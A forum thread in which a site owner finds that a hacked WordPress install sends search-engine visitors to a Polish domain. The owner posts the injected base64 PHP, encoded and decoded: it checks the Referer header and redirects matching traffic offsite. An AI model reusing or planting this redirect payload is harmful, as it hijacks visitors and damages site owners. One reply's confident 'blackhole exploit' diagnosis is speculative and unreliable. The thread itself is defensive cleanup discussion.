I bought a url for my girlfriend (her-name.com), built her a website for christmas But she searched it in google and it redirects to some polish site Code: http://www.bee.**/index.html But when I visit the url directly, it goes to her site? WTF is happening? has someone hacked something somewhere? Help needed ASAP
checked. Noting out of the ordinary Code: # BEGIN WordPress <IfModule mod_rewrite.c> RewriteEngine On RewriteRule ^index\.php$ - [L] RewriteCond %{REQUEST_FILENAME} !-f RewriteCond %{REQUEST_FILENAME} !-d RewriteRule . //index.php [L] </IfModule> # END WordPress
in Cpanel search for "redirects" and in your index.php/.html search for <script location="http://blabla.com"> OR <script language="JavaScript"><!-- window.location.href="http://blabla.com"; // --></script> OR <META HTTP-EQUIV="refresh" CONTENT="sekunden;URL="http://blabla.com">
I found it. I found some base64 code in the top of my wordpress index.php Code: DQplcnJvcl9yZXBvcnRpbmcoMCk7DQokcWF6cGxtPWhlYWRlcnNfc2VudCgpOw0KaWYgKCEkcWF6cGxtKXsNCiRyZWZlcmVyPSRfU0VSVkVSWydIVFRQX1JFRkVSRVInXTsNCiR1YWc9JF9TRVJWRVJbJ0hUVFBfVVNFUl9BR0VOVCddOw0KaWYgKCR1YWcpIHsNCmlmIChzdHJpc3RyKCRyZWZlcmVyLCJ5YWhvbyIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImJpbmciKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJyYW1ibGVyIikgb3Igc3RyaXN0cigkcmVmZXJlciwiZ29nbyIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImxpdmUuY29tIilvciBzdHJpc3RyKCRyZWZlcmVyLCJhcG9ydCIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsIm5pZ21hIikgb3Igc3RyaXN0cigkcmVmZXJlciwid2ViYWx0YSIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImJlZ3VuLnJ1Iikgb3Igc3RyaXN0cigkcmVmZXJlciwic3R1bWJsZXVwb24uY29tIikgb3Igc3RyaXN0cigkcmVmZXJlciwiYml0Lmx5Iikgb3Igc3RyaXN0cigkcmVmZXJlciwidGlueXVybC5jb20iKSBvciBwcmVnX21hdGNoKCIveWFuZGV4XC5ydVwveWFuZHNlYXJjaFw/KC4qPylcJmxyXD0vIiwkcmVmZXJlcikgb3IgcHJlZ19tYXRjaCAoIi9nb29nbGVcLiguKj8pXC91cmwvIiwkcmVmZXJlcikgb3Igc3RyaXN0cigkcmVmZXJlciwibXlzcGFjZS5jb20iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJmYWNlYm9vay5jb20iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJhb2wuY29tIikpIHsNCmlmICghc3RyaXN0cigkcmVmZXJlciwiY2FjaGUiKSBvciAhc3RyaXN0cigkcmVmZXJlciwiaW51cmwiKSl7DQpoZWFkZXIoIkxvY2F0aW9uOiBodHRwOi8vY29udGVudG8uYmVlLnBsLyIpOw0KZXhpdCgpOw0KfQ0KfQ0KfQ0KfQ== decoded to: Code: error_reporting(0); $qazplm=headers_sent(); if (!$qazplm){ $referer=$_SERVER['HTTP_REFERER']; $uag=$_SERVER['HTTP_USER_AGENT']; if ($uag) { if (stristr($referer,"yahoo") or stristr($referer,"bing") or stristr($referer,"rambler") or stristr($referer,"gogo") or stristr($referer,"live.com")or stristr($referer,"aport") or stristr($referer,"nigma") or stristr($referer,"webalta") or stristr($referer,"begun.ru") or stristr($referer,"stumbleupon.com") or stristr($referer,"bit.ly") or stristr($referer,"************") or preg_match("/yandex\.ru\/yandsearch\?(.*?)\&lr\=/",$referer) or preg_match ("/google\.(.*?)\/url/",$referer) or stristr($referer,"myspace.com") or stristr($referer,"facebook.com") or stristr($referer,"aol.com")) { if (!stristr($referer,"cache") or !stristr($referer,"inurl")){ header("Location: http://contento.bee.**/"); exit(); } } } } BASTARD! lol... Now I have to go check every index.php/html I got on my server:headache:
Had a similar thing happen on my vps, all my sites under one account got affected, basiclly they hid redirects at the bottom of the .htaccess file (double check your .htaccess file to be sure there is nothing at the bottom of the file and it hasnt been modified recently) Google SERPs never recovered for about 15 of my sites dispite reinclusion requests. bastards
yeah, jsut going through all the index's in my server.. luckily the ones affected dont seem to be ones that rely on search results
Maybe 'bug' = 'loop hole'. WordPress has a history of being hacked into. There's some good tips for improving WP security here: Code: http://www.problogdesign.com/wordpress/11-best-ways-to-improve-wordpress-security/ Code: http://www.blackhatworld.com/blackhat-seo/templates-themes/374678-amazing-tools-detecting-hacked-themes.html Also, remember to do backups.
Ardley216, a few questions that would help others out. *Were you using a cracked, nulled or free version of a WordPress theme? *Or, did you otherwise acquire your theme from a potentially dangerous source? *Had you performed all of the stated updates for WP? Just curious as to how your site was breached.. Glad you figured things out.
Wordpress is probably the largest hole into your server unless you are constantly updating/ Leave one unupdated for a bit and your whole server will be compromised. Its getting worse as well. . . I don't ever recommend using it.
THe code you have is maybe the blackhole exploit. I believe you are using filezilla as FTP server. Well basically, you may have a virus in your computer which is stealing the XML which contains all your FTP credentials. Then, it automatically connects to place this curl/php/js code in all your index.php. If you don't do anything quick and if this is the black hole exploit, your cpanel files could even be corrupted and you'll be good to do a clean reinstall. This thing is a literaly a pain in the ass to remove. With a hosting customer of mine we spent ages to find the proper antivirus which would block the exploit but not even removing it. You may want to go with AVG free edition. Another lead would also be the source of your wordpress theme.
My account was also hacked. What I learned while cleaning my websites that the code is placed not just in index.php, but practically in ALL .php files of the wordpress. What I ended up doing is compressing all the files, download the zip to my computer and then cleaned all php files wit "search and replace" software . On every website there were at least 50 places with the code inserted ! The other option is to do clean re-install. I could not do this because of some custom codes on my websites Glad if this helps